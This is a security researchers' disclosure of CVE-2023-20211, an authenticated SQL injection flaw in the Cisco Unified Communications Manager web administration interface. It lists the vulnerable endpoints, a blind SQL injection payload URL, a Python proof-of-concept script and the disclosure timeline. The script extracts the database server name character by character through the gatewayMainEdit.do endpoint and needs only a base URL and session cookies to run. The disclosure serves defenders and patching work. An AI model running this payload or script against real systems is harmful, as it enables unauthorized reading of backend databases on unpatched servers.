CVE-2023-20211

Name

Multiple Authenticated SQL Injection Vulnerabilities

CVSS score

8.1 (High)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Product name

Cisco Unified Communications Manager

Confirmed exploitable versions

< 12.5(1)su8

Researcher

Stanisław Koza and Jakub Sajniak

Description

A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow any authenticated, remote attacker to conduct SQL injection attacks on an affected system.

Proof-of-concept

There are multiple endpoints vulnerable to SQL injection identified in this CVE:

GET /ccmadmin/e911MessagesEdit.do
GET /ccmadmin/gatewayMainEdit.do
GET /ccmadmin/phoneFindList.do
POST /ccmadmin/phoneFindList.do
GET /ccmadmin/userFindList.do
POST /ccmadmin/userFindList.do

This Proof-of-concept uses injection found in the /ccmadmin/e911MessagesEdit.do endpoint.

To present the full impact of this vulnerability, a Proof of Concept exploit was created. The following exploit aims to exfiltrate DBSERVERNAME from table sysusers from database running on the backend.

In this proof-of-concept following payload is used:

/ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%20{currentLength})='{passwordPrefix}')%20%3e%200)%20--&protocol=0

Proof-of-concept code:

# POC for CISCO Unified CM Administration SQL Injection
# Injection point is:
# /ccmadmin/gatewayMainEdit.do?key=&product=<injection>
# POC extracts DBSERVERNAME from sysusers
# PoC Created by Stanisław Koza from STM Cyber


import urllib3 
import requests 
from string import printable

# Configure variables below
baseurl = ""
cookies = {
    "JSESSIONID": "",
    "com.cisco.ccm.admin.servlets.RequestToken.REQUEST_TOKEN_KEY":"",
    "JSESSIONIDSSO":""
}
# Configure this ^^^

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!#$&\()*,-./:;<=>?@[]^`|~"
checkValue = "Validate String rule for Telepresence devices"


currentLength=1
extracted=''
print("Extracting: ",end="")
for i in range(0,50):
    foundExtension=False
    for c in charset:
        currentLength = len(extracted)+1
        passwordPrefix = extracted+c

        url = baseurl + f"/ccmadmin/gatewayMainEdit.do?key=&product=-1%20or%20((SELECT%20COUNT(*)%20FROM%20sysusers%20WHERE%201=1%20AND%20SUBSTRING(DBSERVERNAME%20FROM%201%20FOR%20{currentLength})='{passwordPrefix}')%20%3e%200)%20--&protocol=0"

        r = requests.get(url, cookies=cookies, verify=False)
        if checkValue not in r.text:
            extracted=passwordPrefix
            foundExtension=True
            print(extracted[-1],end="",flush=True)
            break
    if not foundExtension:
        break
print(f"\n[+] Extracted from db: {extracted}")

Timeline

03-04-2023 - Vulnerability reported to Cisco PSIRT
03-04-2023 - First response from Cisco
20-04-2023 - Successful reproduction of the vulerability by Cisco
16-08-2023 - CVE-2023-20211 is assigned to the vulnerability
16-08-2023 - Security advisory is published by Cisco
10-10-2023 - Publication of PoC

References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-injection-g6MbwH2
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-20211